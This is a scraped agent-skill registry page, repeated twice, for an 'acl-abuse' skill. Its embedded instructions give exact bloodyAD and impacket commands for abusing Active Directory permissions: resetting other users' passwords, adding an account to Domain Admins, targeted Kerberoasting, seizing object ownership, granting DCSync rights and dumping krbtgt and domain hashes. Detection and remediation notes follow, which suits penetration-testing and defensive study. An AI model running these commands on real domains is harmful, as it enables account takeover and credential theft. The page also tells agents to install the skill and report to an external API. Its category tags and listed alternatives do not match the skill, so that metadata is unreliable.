Creator · ADScanPro
Last updated · Sep 4, 2026
Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbou
Creator · ADScanPro
Last updated · Sep 4, 2026
Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbou
Creator · ADScanPro
Last updated · Sep 4, 2026
Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbou
Creator · ADScanPro
Last updated · Sep 4, 2026
Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbou
Sandbox only
Install targets
Codex install prompt
Install the "acl-abuse" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuse. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique, not a user entry path. After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {"event_id":"install_<unique-id>","skill_slug":"adscanpro-acl-abuse","task":"Install acl-abuse","agent":"codex","outcome":"success","install_used":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.Supply asset profile
Code review, repo analysis, testing, CI, GitHub, DevOps, and developer workflow skills.
Scenario
Testing and QA
I need my agent to test a web app, reproduce bugs, and verify fixes.
Agent fit
Claude Code + CLI + Codex
Codex, Claude Code, Cursor, CLI, or custom agents.
Install
Ready
npx skills add ADScanPro/Claude-AD --skill acl-abuse
Maintenance
fresh
12d since push
Risk
Needs review
Permission surface may require sandboxing
GitHub quality
153
68/100 Quality · 77/100 Trust
Coverage tags
Review notes
Permission surface may require sandboxing · Quality score needs review
Agent adoption scorecard
These scores combine public repository metadata, OpenAgentSkill review signals, maintenance freshness, and install readiness. They are a shortlist signal, not a replacement for human review.
Quality
PromisingUseful candidate, but compare it with alternatives before adopting.
Trust
Sandbox onlyUseful candidate with missing or mixed trust signals. Keep it in an isolated workspace until the outcome loop proves task fit.
Audit
Needs reviewA machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
OpenAgentSkill Trust Score v5
Run only in a sandbox and compare close alternatives before using it for real work.
Stars
153 GitHub stars
Repo activity
153 stars, 24 forks
Maintenance
12d since push
License
MIT
Install
npx skills add ADScanPro/Claude-AD --skill acl-abuse
Install safety
Agent-readable metadata
Use this block or the embedded JSON to decide whether an agent should install this skill, choose an alternative, or ask for human review first.
Suited tasks
Suited agents
Install decision
Trust and risk
Outcome loop
Install command
npx skills add ADScanPro/Claude-AD --skill acl-abuseDo not use when
Alternative
16.3K Stars
npx skills add hardikpandya/stop-slop --skill stop-slop
Alternative
37.4K Stars
npx skills add blader/humanizer --skill humanizer
Alternative
5.8K Stars
npx skills add petergyang/no-ai-slop --skill no-ai-slop
Alternative
4.8K Stars
npx skills add cursor/plugins --skill unslop
Agent safety v2
This skill should not be selected by an agent without explicit human security review.
Do not auto-install. Inspect the source, dependencies, and permission surface first.
high
Skill metadata references terminal, CLI, shell, subprocess, or command execution workflows.
medium
Skill likely fetches remote pages, APIs, repositories, or external services.
high
Skill metadata references credentials, tokens, environment variables, or secret-bearing workflows.
Agent resolve plan
The Resolve API returns the selected skill, alternatives, safety policy, audit notes, install target, and copy-paste prompt an agent can follow without scraping this page.
Open JSON
/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Resolve text
/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text
Install handoff
/api/skills/adscanpro-acl-abuse/install
Agent should check
Copy prompt
Task: Use acl-abuse in this workspace.
Resolve first: https://www.openagentskill.com/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Review install handoff: https://www.openagentskill.com/api/skills/adscanpro-acl-abuse/install
Install command: npx skills add ADScanPro/Claude-AD --skill acl-abuse
Before running it, summarize audit warnings, required permissions, and the fallback skill if install is risky.Agent handoff
Use the public install endpoint to fetch the command, safety checklist, target prompts, and canonical links for this skill.
Install handoff
/api/skills/adscanpro-acl-abuse/install
LLM text format
/api/skills/adscanpro-acl-abuse/install?format=text
Find alternatives
/api/skills/search?q=acl-abuse&limit=3
Agent prompt
Use acl-abuse for this task. Review https://www.openagentskill.com/api/skills/adscanpro-acl-abuse/install, then install with: npx skills add ADScanPro/Claude-AD --skill acl-abuseRegistry metadata
This page exposes the same decision, trust, audit, use-case, and install signals through the Registry API, so agents can rank this skill without scraping the UI.
Manifest
/api/registry/manifest/adscanpro-acl-abuse
LLM text
/api/registry/manifest/adscanpro-acl-abuse?format=text
Install alias
/api/registry/install/adscanpro-acl-abuse
Recommend
/api/registry/recommend?task=Use%20acl-abuse%20in%20an%20agent%20workflow&limit=3
Agent fit
Browser automation
Platforms
Claude Code
Audit report
A machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
Agent decision cockpit
Prototype with this skill first; keep a fallback candidate ready.
Role in stack
Fallback candidate
Primary fit
Browser automation
Trust label
Prototype first
Install path
Command ready
Use when
Evidence
review first
Implementation path
Trust profile
Useful candidate with missing or mixed trust signals. Keep it in an isolated workspace until the outcome loop proves task fit.
GitHub adoption
INFO153 GitHub stars
Stars/forks activity
CHECK153 stars, 24 forks; issue activity unavailable in current metadata
Recent maintenance
PASS12d since push
License clarity
PASSMIT
Good signals
Review before install
Recommended action
Run only in a sandbox and compare close alternatives before using it for real work.
Quality profile
Useful candidate, but compare it with alternatives before adopting.
Workflow fit
Operate web apps
I need my agent to control a browser, fill forms, and verify web app workflows.
Reduce risk
I need my agent to scan a project for security risks and summarize what needs attention.
Verify behavior
I need my agent to test a web app, reproduce bugs, and verify fixes.
Workflow fit
Operate and verify web apps
A workflow for agents that navigate products, fill forms, take screenshots, and verify real user flows across web applications.
Scrape, clean, and reuse web data
A practical workflow for agents that crawl public pages, extract clean content, normalize data, and hand it to downstream research or RAG workflows.
Design, build, test, and ship interfaces
A practical workflow for agents that turn product briefs or Figma designs into polished frontend code, review the result, test it in a browser, and prepare a safe deployment.
Alternative shortlist
Similar skills that may fit this task.
Eliminates predictable AI writing patterns from prose while preserving specific meaning and reader trust.
Rewrites AI-sounding text so it reads naturally while preserving every factual claim and matching the writer's voice.
Audits or minimally edits drafts to remove named AI-writing patterns without flattening the author's voice.
Applies Cursor's prose-discipline rules to remove filler and AI writing tells from agent-facing and user-facing text.
--- name: acl-abuse description: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique, not a user entry path. ---
# ACL Abuse
Active Directory permissions are a graph. A single misconfigured Access Control Entry (ACE), say a low-priv user with `GenericAll` over a group, `WriteDacl` over a computer, or `WriteOwner` over an OU, is a directed edge you can walk from where you are toward Domain Admin. This skill turns those edges into concrete commands with **bloodyAD** and **impacket**, after **BloodHound CE** (Apache-2.0, genuinely open source) has drawn the path.
**Find the paths first (BloodHound CE).** Collect with a standard collector, import into BloodHound CE, and look at the outbound control edges from your owned principal: `GenericAll`, `GenericWrite`, `WriteDacl`, `Owns`/`WriteOwner`, `AddMember`, `ForceChangePassword`, `AllExtendedRights`, and `DCSync`. Pre-built queries like "Shortest paths from Owned principals" and "Find principals with DCSync rights" hand you the chain.
Collect edges with a standard collector, for example: ``` nxc ldap 10.0.0.10 -u user -p 'Password123' --bloodhound --collection All --dns-server 10.0.0.10 ``` or run `rusthound-ce` / SharpHound CE and import the ZIP into BloodHound CE.
---
## GenericAll
**MITRE ATT&CK:** T1222 (Permission Modification) / T1098 (Account Manipulation)
**What it is.** Full control over the target object. What you do with it depends on the target type: - **Over a user:** reset their password (ForceChangePassword) or set an SPN and Kerberoast them (targeted roasting), or set `DONT_REQ_PREAUTH` and AS-REP roast. - **Over a group:** add yourself as a member (AddMember). - **Over a computer:** write RBCD (`msDS-AllowedToActOnBehalfOfOtherIdentity`) and impersonate (see the Kerberos skill).
Reset a user's password: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set password TARGETUSER 'NewPass123!' ```
Add yourself to a group: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add groupMember 'Domain Admins' owneduser ```
Targeted Kerberoast (set an SPN you control, then roast, see Kerberos skill): ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set object TARGETUSER servicePrincipalName -v 'fake/svc' GetUserSPNs.py -request-user TARGETUSER -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
---
## GenericWrite
**MITRE ATT&CK:** T1098
**What it is.** Write non-protected attributes on the target. Enough to set an SPN (targeted Kerberoast), set `DONT_REQ_PREAUTH` (targeted AS-REP roast), or write `msDS-AllowedToActOnBehalfOfOtherIdentity` on a computer (RBCD). Not enough to reset the password directly on a user (that is ForceChangePassword / GenericAll).
Set the preauth-disabled flag for a targeted AS-REP roast: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add uac TARGETUSER -f DONT_REQ_PREAUTH GetNPUsers.py -dc-ip 10.0.0.10 -request CORP.LOCAL/owneduser:'Password123' ```
Write RBCD on a computer you can then S4U through: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add rbcd TARGET$ EVIL$ ```
---
## ForceChangePassword
**MITRE ATT&CK:** T1098
**What it is.** The `User-Force-Change-Password` extended right lets you reset the target user's password without knowing the old one. Straight account takeover of that user.
``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set password TARGETUSER 'NewPass123!' ``` impacket alternative: ``` net rpc password TARGETUSER 'NewPass123!' -U 'CORP.LOCAL/owneduser%Password123' -S 10.0.0.10 ```
**Note:** resetting an in-use account is noisy and disruptive; it locks the real user out. Prefer targeted Kerberoast/AS-REP where the edge allows, and coordinate password resets with the client.
---
## AddMember
**MITRE ATT&CK:** T1098
**What it is.** Write access to a group's `member` attribute. Add a principal you control to a privileged group (a nested group that eventually reaches Domain Admins is just as good).
``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add groupMember 'Backup Operators' owneduser ```
---
## WriteDACL
**MITRE ATT&CK:** T1222.001 (Windows Permission Modification)
**What it is.** You can rewrite the target's DACL, so you grant *yourself* whatever ACE you want (up to full control) and then exploit that. The common escalation is to grant yourself the replication rights on the domain object (setting up DCSync, see below) or GenericAll on a user/group.
Grant yourself an ACE on the target (impacket dacledit): ``` dacledit.py -action write -rights FullControl -principal owneduser \ -target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \ -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
bloodyAD equivalent (grant a right on an object): ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add genericAll 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduser ```
---
## WriteOwner / Owns
**MITRE ATT&CK:** T1222.001
**What it is.** You can set yourself as the *owner* of the target object. The owner can always rewrite the DACL, so WriteOwner chains into WriteDACL into full control. Two steps: take ownership, then grant yourself rights.
Take ownership (impacket owneredit): ``` owneredit.py -action write -new-owner owneduser \ -target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \ -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ``` Then grant yourself full control with dacledit (as above), then exploit as GenericAll.
bloodyAD one-liner for ownership: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set owner 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduser ```
---
## Replication rights → DCSync (POST-COMPROMISE ONLY)
**MITRE ATT&CK:** T1003.006 (OS Credential Dumping: DCSync)
**Frame this correctly.** DCSync is **not a user entry path**. It is a post-compromise credential-extraction technique performed by a principal that *already holds* the directory replication extended rights, `DS-Replication-Get-Changes` and `DS-Replication-Get-Changes-All`, on the domain object. In a healthy domain those rights belong only to Domain Controllers and to Domain/Enterprise Admins, so being able to DCSync normally means you are already Domain Admin (or the equivalent). It matters to ACL abuse only in one specific case: **a non-DC, non-admin principal has been mis-granted those replication rights**, usually as the *result* of a WriteDACL/WriteOwner chain above. In that case DCSync is the payoff of the ACL abuse, still executed after you have obtained (or granted yourself) the replication rights, never before.
So the ACL entry point is the mis-granted right (or granting it to yourself via WriteDACL on the domain object); the DCSync itself is the follow-on.
Grant the replication rights (only if you have WriteDACL on the domain head, the abusable misconfiguration): ``` dacledit.py -action write -rights DCSync -principal owneduser \ -target-dn 'DC=corp,DC=local' -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
Then, holding those rights, replicate secrets (impacket secretsdump): ``` secretsdump.py -just-dc-user 'CORP\krbtgt' CORP.LOCAL/owneduser:'Password123'@10.0.0.10 secretsdump.py -just-dc CORP.LOCAL/owneduser:'Password123'@10.0.0.10 # full dump ``` netexec equivalent: ``` nxc smb 10.0.0.10 -u owneduser -p 'Password123' --ntds ```
Dumping `krbtgt` enables Golden Tickets; dumping the Administrator hash enables pass-the-hash. Both are post-DA persistence, not entry.
---
## Detection (Event IDs)
- **5136**: a directory object was modified. This is the central ACL-abuse event: it fires on DACL changes, group membership changes, SPN writes, `userAccountControl` flips, RBCD writes, and owner changes. Watch the `AttributeLDAPDisplayName` (e.g. `nTSecurityDescriptor`, `member`, `servicePrincipalName`, `msDS-AllowedToActOnBehalfOfOtherIdentity`). - **5137/5139/5141**: object created/moved/deleted, for the surrounding activity. - **4662**: an operation was performed on an object. For DCSync, look for 4662 with the replication control access GUIDs `1131f6aa-9c07-11d1-f79f-00c04fc2dcd2` (Get-Changes) and `1131f6ad-9c07-11d1-f79f-00c04fc2dcd2` (Get-Changes-All) requested by a principal that is **not** a Domain Controller, which is the tell that a non-DC is replicating. - **4738**: a user account was changed (attribute-level). - **4728/4732/4756**: a member was added to a security-enabled group. - Microsoft Defender for Identity raises "Suspected DCSync attack" on replication from a non-DC.
---
## Remediation to write up
- **Audit ACEs.** Enumerate non-default ACEs across users, groups, computers, OUs and the domain head. Any GenericAll/GenericWrite/WriteDacl/WriteOwner held by a non-Tier-0 principal over a privileged object is a finding. - **Strip replication rights from everything that is not a DC.** Only Domain Controllers and the intended Tier-0 admins should hold `DS-Replication-Get-Changes-All`. Remove it from every user/group/service account that has it. - **Protect the domain head DACL.** `WriteDacl`/`WriteOwner` on `DC=corp,DC=local` is game over; lock it to Tier-0. - **Set `MachineAccountQuota` to 0** to kill the RBCD-via-new-computer variant. - Alert on 5136 changes to security descriptors and to `member` on privileged groups; alert on 4662 replication access from non-DCs. - Use tiered administration so the graph has no low-priv-to-Tier-0 edges in the first place.
Only exploit ACLs on systems you are authorized to test. Password resets are disruptive; coordinate. Use lab/generic DNs and names in write-ups.
---
## Reference
- DACL abuse (GenericAll/GenericWrite/WriteDacl/WriteOwner/AddMember): https://www.thehacker.recipes/ad/movement/dacl/ - Targeted Kerberoasting: https://www.thehacker.recipes/ad/movement/kerberos/roasting/kerberoast - DCSync: https://www.thehacker.recipes/ad/movement/credentials/dumping/dcsync
Source provenance
Decision snapshot
recent repository activity
Audit
Install and adoption review
Agent-proven evidence
Outcome reports after resolve, review, install, and one narrow run.
No agent outcome data yet. The first agent run can report success, setup needs, risk blocks, failure, or not-relevant through /api/agent/outcome.
Install
Free and open source. Review the report before installing into production agents.
Growth loop
Scenario-led draft for acl-abuse, ready for a manual X post.
A practical pick for a repeatable workflow: acl-abuse: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWri... 153 stars https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=x
Listing + install path for acl-abuse: https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=x Install: npx skills add ADScanPro/Claude-AD --skill acl-abuse
Listing source
This listing was indexed from public sources and is not marked official until a maintainer claim is approved.
Attribution links to the public repository or creator profile. Creators can claim the listing to update ownership signals.
Claim this skillOwner claim
This Registry indexed listing is attributed to ADScanPro but is not marked official yet. Claim it to add a verified owner signal and make future launch, install, and audit updates easier to trust.
Creator backlink kit
Show the canonical listing, current trust and audit signals, and real Agent-Proven evidence where developers evaluate the repository.
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse/audit)
[](https://www.openagentskill.com/skills/adscanpro-acl-abuse?ref=github&utm_source=github&utm_medium=referral&utm_campaign=creator_badge)ADScanPro
@adscanpro
Share whether this skill looks useful for your agent workflow. Aggregated feedback improves rankings over time.
Sandbox only
stop-slop
Eliminates predictable AI writing patterns from prose while preserving specific meaning and reader trust.
16.3K StarsHumanizer
Rewrites AI-sounding text so it reads naturally while preserving every factual claim and matching the writer's voice.
37.4K Starsno-ai-slop
Audits or minimally edits drafts to remove named AI-writing patterns without flattening the author's voice.
5.8K Starsunslop
Applies Cursor's prose-discipline rules to remove filler and AI writing tells from agent-facing and user-facing text.
4.8K StarsSandbox only
Install targets
Codex install prompt
Install the "acl-abuse" agent skill from https://github.com/ADScanPro/Claude-AD/tree/main/skills/acl-abuse. Read its SKILL.md or equivalent instructions first, install only the files needed for this workspace, and summarize any required setup before using it. Skill purpose: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique, not a user entry path. After the install attempt, report the result to https://www.openagentskill.com/api/agent/outcome with POST JSON {"event_id":"install_<unique-id>","skill_slug":"adscanpro-acl-abuse","task":"Install acl-abuse","agent":"codex","outcome":"success","install_used":true}. Replace event_id with a unique value and outcome with success or failed. Report success only after the skill is installed and a minimal verification passes.Supply asset profile
Code review, repo analysis, testing, CI, GitHub, DevOps, and developer workflow skills.
Scenario
Testing and QA
I need my agent to test a web app, reproduce bugs, and verify fixes.
Agent fit
Claude Code + CLI + Codex
Codex, Claude Code, Cursor, CLI, or custom agents.
Install
Ready
npx skills add ADScanPro/Claude-AD --skill acl-abuse
Maintenance
fresh
12d since push
Risk
Needs review
Permission surface may require sandboxing
GitHub quality
153
68/100 Quality · 77/100 Trust
Coverage tags
Review notes
Permission surface may require sandboxing · Quality score needs review
Agent adoption scorecard
These scores combine public repository metadata, OpenAgentSkill review signals, maintenance freshness, and install readiness. They are a shortlist signal, not a replacement for human review.
Quality
PromisingUseful candidate, but compare it with alternatives before adopting.
Trust
Sandbox onlyUseful candidate with missing or mixed trust signals. Keep it in an isolated workspace until the outcome loop proves task fit.
Audit
Needs reviewA machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
OpenAgentSkill Trust Score v5
Run only in a sandbox and compare close alternatives before using it for real work.
Stars
153 GitHub stars
Repo activity
153 stars, 24 forks
Maintenance
12d since push
License
MIT
Install
npx skills add ADScanPro/Claude-AD --skill acl-abuse
Install safety
Agent-readable metadata
Use this block or the embedded JSON to decide whether an agent should install this skill, choose an alternative, or ask for human review first.
Suited tasks
Suited agents
Install decision
Trust and risk
Outcome loop
Install command
npx skills add ADScanPro/Claude-AD --skill acl-abuseDo not use when
Alternative
16.3K Stars
npx skills add hardikpandya/stop-slop --skill stop-slop
Alternative
37.4K Stars
npx skills add blader/humanizer --skill humanizer
Alternative
5.8K Stars
npx skills add petergyang/no-ai-slop --skill no-ai-slop
Alternative
4.8K Stars
npx skills add cursor/plugins --skill unslop
Agent safety v2
This skill should not be selected by an agent without explicit human security review.
Do not auto-install. Inspect the source, dependencies, and permission surface first.
high
Skill metadata references terminal, CLI, shell, subprocess, or command execution workflows.
medium
Skill likely fetches remote pages, APIs, repositories, or external services.
high
Skill metadata references credentials, tokens, environment variables, or secret-bearing workflows.
Agent resolve plan
The Resolve API returns the selected skill, alternatives, safety policy, audit notes, install target, and copy-paste prompt an agent can follow without scraping this page.
Open JSON
/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Resolve text
/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium&format=text
Install handoff
/api/skills/adscanpro-acl-abuse/install
Agent should check
Copy prompt
Task: Use acl-abuse in this workspace.
Resolve first: https://www.openagentskill.com/api/agent/resolve?task=Use%20acl-abuse%20for%20an%20agent%20workflow&agent=codex&max_risk=medium
Review install handoff: https://www.openagentskill.com/api/skills/adscanpro-acl-abuse/install
Install command: npx skills add ADScanPro/Claude-AD --skill acl-abuse
Before running it, summarize audit warnings, required permissions, and the fallback skill if install is risky.Agent handoff
Use the public install endpoint to fetch the command, safety checklist, target prompts, and canonical links for this skill.
Install handoff
/api/skills/adscanpro-acl-abuse/install
LLM text format
/api/skills/adscanpro-acl-abuse/install?format=text
Find alternatives
/api/skills/search?q=acl-abuse&limit=3
Agent prompt
Use acl-abuse for this task. Review https://www.openagentskill.com/api/skills/adscanpro-acl-abuse/install, then install with: npx skills add ADScanPro/Claude-AD --skill acl-abuseRegistry metadata
This page exposes the same decision, trust, audit, use-case, and install signals through the Registry API, so agents can rank this skill without scraping the UI.
Manifest
/api/registry/manifest/adscanpro-acl-abuse
LLM text
/api/registry/manifest/adscanpro-acl-abuse?format=text
Install alias
/api/registry/install/adscanpro-acl-abuse
Recommend
/api/registry/recommend?task=Use%20acl-abuse%20in%20an%20agent%20workflow&limit=3
Agent fit
Browser automation
Platforms
Claude Code
Audit report
A machine-readable review of install readiness, security metadata, maintenance, and adoption risk.
Agent decision cockpit
Prototype with this skill first; keep a fallback candidate ready.
Role in stack
Fallback candidate
Primary fit
Browser automation
Trust label
Prototype first
Install path
Command ready
Use when
Evidence
review first
Implementation path
Trust profile
Useful candidate with missing or mixed trust signals. Keep it in an isolated workspace until the outcome loop proves task fit.
GitHub adoption
INFO153 GitHub stars
Stars/forks activity
CHECK153 stars, 24 forks; issue activity unavailable in current metadata
Recent maintenance
PASS12d since push
License clarity
PASSMIT
Good signals
Review before install
Recommended action
Run only in a sandbox and compare close alternatives before using it for real work.
Quality profile
Useful candidate, but compare it with alternatives before adopting.
Workflow fit
Operate web apps
I need my agent to control a browser, fill forms, and verify web app workflows.
Reduce risk
I need my agent to scan a project for security risks and summarize what needs attention.
Verify behavior
I need my agent to test a web app, reproduce bugs, and verify fixes.
Workflow fit
Operate and verify web apps
A workflow for agents that navigate products, fill forms, take screenshots, and verify real user flows across web applications.
Scrape, clean, and reuse web data
A practical workflow for agents that crawl public pages, extract clean content, normalize data, and hand it to downstream research or RAG workflows.
Design, build, test, and ship interfaces
A practical workflow for agents that turn product briefs or Figma designs into polished frontend code, review the result, test it in a browser, and prepare a safe deployment.
Alternative shortlist
Similar skills that may fit this task.
Eliminates predictable AI writing patterns from prose while preserving specific meaning and reader trust.
Rewrites AI-sounding text so it reads naturally while preserving every factual claim and matching the writer's voice.
Audits or minimally edits drafts to remove named AI-writing patterns without flattening the author's voice.
Applies Cursor's prose-discipline rules to remove filler and AI writing tells from agent-facing and user-facing text.
--- name: acl-abuse description: Abusing Active Directory object ACLs (DACL/ownership) for privilege escalation and lateral movement (GenericAll, GenericWrite, WriteDACL, WriteOwner, AddMember, ForceChangePassword, and replication rights via DS-Replication-Get-Changes-All). Use when BloodHound CE shows an outbound control edge from a principal you own toward a higher-value object, and you want the exact bloodyAD/impacket command to weaponize that ACE, plus detection and remediation. DCSync is covered here strictly as a post-compromise technique, not a user entry path. ---
# ACL Abuse
Active Directory permissions are a graph. A single misconfigured Access Control Entry (ACE), say a low-priv user with `GenericAll` over a group, `WriteDacl` over a computer, or `WriteOwner` over an OU, is a directed edge you can walk from where you are toward Domain Admin. This skill turns those edges into concrete commands with **bloodyAD** and **impacket**, after **BloodHound CE** (Apache-2.0, genuinely open source) has drawn the path.
**Find the paths first (BloodHound CE).** Collect with a standard collector, import into BloodHound CE, and look at the outbound control edges from your owned principal: `GenericAll`, `GenericWrite`, `WriteDacl`, `Owns`/`WriteOwner`, `AddMember`, `ForceChangePassword`, `AllExtendedRights`, and `DCSync`. Pre-built queries like "Shortest paths from Owned principals" and "Find principals with DCSync rights" hand you the chain.
Collect edges with a standard collector, for example: ``` nxc ldap 10.0.0.10 -u user -p 'Password123' --bloodhound --collection All --dns-server 10.0.0.10 ``` or run `rusthound-ce` / SharpHound CE and import the ZIP into BloodHound CE.
---
## GenericAll
**MITRE ATT&CK:** T1222 (Permission Modification) / T1098 (Account Manipulation)
**What it is.** Full control over the target object. What you do with it depends on the target type: - **Over a user:** reset their password (ForceChangePassword) or set an SPN and Kerberoast them (targeted roasting), or set `DONT_REQ_PREAUTH` and AS-REP roast. - **Over a group:** add yourself as a member (AddMember). - **Over a computer:** write RBCD (`msDS-AllowedToActOnBehalfOfOtherIdentity`) and impersonate (see the Kerberos skill).
Reset a user's password: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set password TARGETUSER 'NewPass123!' ```
Add yourself to a group: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add groupMember 'Domain Admins' owneduser ```
Targeted Kerberoast (set an SPN you control, then roast, see Kerberos skill): ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set object TARGETUSER servicePrincipalName -v 'fake/svc' GetUserSPNs.py -request-user TARGETUSER -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
---
## GenericWrite
**MITRE ATT&CK:** T1098
**What it is.** Write non-protected attributes on the target. Enough to set an SPN (targeted Kerberoast), set `DONT_REQ_PREAUTH` (targeted AS-REP roast), or write `msDS-AllowedToActOnBehalfOfOtherIdentity` on a computer (RBCD). Not enough to reset the password directly on a user (that is ForceChangePassword / GenericAll).
Set the preauth-disabled flag for a targeted AS-REP roast: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add uac TARGETUSER -f DONT_REQ_PREAUTH GetNPUsers.py -dc-ip 10.0.0.10 -request CORP.LOCAL/owneduser:'Password123' ```
Write RBCD on a computer you can then S4U through: ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add rbcd TARGET$ EVIL$ ```
---
## ForceChangePassword
**MITRE ATT&CK:** T1098
**What it is.** The `User-Force-Change-Password` extended right lets you reset the target user's password without knowing the old one. Straight account takeover of that user.
``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ set password TARGETUSER 'NewPass123!' ``` impacket alternative: ``` net rpc password TARGETUSER 'NewPass123!' -U 'CORP.LOCAL/owneduser%Password123' -S 10.0.0.10 ```
**Note:** resetting an in-use account is noisy and disruptive; it locks the real user out. Prefer targeted Kerberoast/AS-REP where the edge allows, and coordinate password resets with the client.
---
## AddMember
**MITRE ATT&CK:** T1098
**What it is.** Write access to a group's `member` attribute. Add a principal you control to a privileged group (a nested group that eventually reaches Domain Admins is just as good).
``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add groupMember 'Backup Operators' owneduser ```
---
## WriteDACL
**MITRE ATT&CK:** T1222.001 (Windows Permission Modification)
**What it is.** You can rewrite the target's DACL, so you grant *yourself* whatever ACE you want (up to full control) and then exploit that. The common escalation is to grant yourself the replication rights on the domain object (setting up DCSync, see below) or GenericAll on a user/group.
Grant yourself an ACE on the target (impacket dacledit): ``` dacledit.py -action write -rights FullControl -principal owneduser \ -target-dn 'CN=TargetUser,CN=Users,DC=corp,DC=local' \ -dc-ip 10.0.0.10 CORP.LOCAL/owneduser:'Password123' ```
bloodyAD equivalent (grant a right on an object): ``` bloodyAD --host 10.0.0.10 -d CORP.LOCAL -u owneduser -p 'Password123' \ add genericAll 'CN=TargetUser,CN=Users,DC=corp,DC=local' owneduser ```
---
## WriteOwner / Owns
**MITRE ATT&CK:** T1222.001
**What it is.** You can set yourself as the *owner* of the target object. The owner can always rewrite the DACL, so WriteOwner chains into WriteDACL into full control. Two steps: take ownership, then grant yourself rights.
